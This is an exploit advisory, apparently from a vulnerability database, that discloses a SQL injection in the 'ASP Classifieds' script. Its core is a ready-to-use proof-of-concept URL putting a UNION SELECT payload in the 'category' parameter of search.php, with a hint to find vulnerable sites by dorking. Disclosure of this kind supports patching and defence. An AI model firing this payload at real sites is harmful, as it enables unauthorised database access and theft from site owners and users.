ASP Classifieds SQL Injection

2012.03.19
Credit: r45c4l
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: ASP Classifieds Sql Injection # Date: 17/03/2012 # Author: r45c4l # Email: infosecpirate@gmail.com # Script url: http://preproject.com/pclasp/home/default.asp # Version: N/A # CVE : () :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Product Description : ASP Classifieds is one of the most customizable Classified ad program that exist for ASP and Access. Unlimited Images , unlimited categories and much much more makes it perfect for those who wants to set up a used stamps classifieds to those wanting to show and sell real estates. Product Cost : 58$ =======================Exploit==================================== ---ICW--- [ EXPL0!T ] SQL Injection p0c - http://SERVER/classi/search.php?category=[SQli] PoC - http://SERVER/classi/search.php?category=-1+union+all+select+version()-- [Note: Tested on demo website] d0rk - use your brain ;) =========================================================================== Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Hoody, sam All members of ICW, AH and darkc0de, and all Indian Hackers Special Greetz to : b4ltazar and s1nner_01 === End () ====

References:

http://preproject.com/pclasp/home/default.asp


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top